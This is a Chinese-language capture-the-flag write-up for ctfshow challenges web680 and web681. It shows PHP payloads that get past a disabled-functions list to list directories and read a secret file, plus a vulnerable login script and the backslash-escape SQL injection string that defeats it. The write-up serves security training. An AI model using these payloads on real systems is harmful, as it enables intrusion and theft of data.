web680

image-20220415184940885

image-20220415200517421

看看还剩啥

assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstoped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,fopen,file_get_contents,fread,file,readfile,opendir,readdir,closedir,rewinddir
code=print_r(scandir('./'));

image-20220415200647646

code=highlight_file("secret_you_never_know");

image-20220415200719749

code=var_dump(scandir("."));
code=$a=new DirectoryIterator('glob:///var/www/html/*');foreach($a as $f){echo($f->__toString()." ");}

RCE总结

web681

不能扫目录，我们看看字典里有没有，就直接访问了

image-20220415203154362

image-20220415203139503

check.php

<?php

/*
# -*- coding: utf-8 -*-
Author: h1xa
Date: 2021-09-24 14:58:16
Last Modified by: h1xa
Last Modified time: 2021-09-24 16:04:49
email: h1xa@ctfer.com
link: https://ctfer.com

*/

// Suppresses all PHP error/warning output for this script, so failures are not shown to the client.
error_reporting(0);
// waf() and the db class are not defined in this file; presumably they come from common.php — verify.
include "common.php";

session_start();

if (isset($_POST["name"])){
// Input pipeline: waf() -> trim() -> strip every single-quote character.
// Only the quote itself is removed; other characters (including a backslash) survive.
$name = str_replace("'", "", trim(waf($_POST["name"])));
// strlen() counts bytes, not characters; anything longer than 11 bytes is rejected here.
if (strlen($name) > 11){
echo("<script>alert('name too long')</script>");
}else{
// NOTE(review): $name is interpolated directly into the SQL text (twice) instead of being bound
// as a parameter. Stripping quotes is not an injection defence — a trailing backslash left in
// $name escapes the closing quote of the first literal, as the resulting query quoted below shows.
// The mitigation is a prepared statement with $name passed as a bound parameter.
$sql = "select count(*) from ctfshow_users where username = '$name' or nickname = '$name'";
// NOTE(review): echoes the fully built query back to the client — discloses query structure.
echo $sql;
$db = new db();
// select_one_array()'s return shape is not visible here; $result[0] is presumably the count column.
$result = $db->select_one_array($sql);
// A non-zero count flags the session as 'black', otherwise 'green'.
if ($result[0]){
$_SESSION['hat'] = 'black';
echo 'good job';
}else{
$_SESSION['hat'] = 'green';
}
// NOTE(review): output was already sent above (echo $sql), so this header() call may be rejected
// with "headers already sent" unless output buffering is on — and error_reporting(0) would hide that.
header("Location: index.php");
}

}


select count(*) from ctfshow_users where username = 'or/**/(1)#\' or nickname = 'or/**/(1)#\'

我们添加了 \ 就会把 ' 转义

or/**/(1)#\' or nickname = 

查询语句就会变成

select count(*) from ctfshow_users where username = 'xxx'or/**/(1)#\'

image-20220416180738970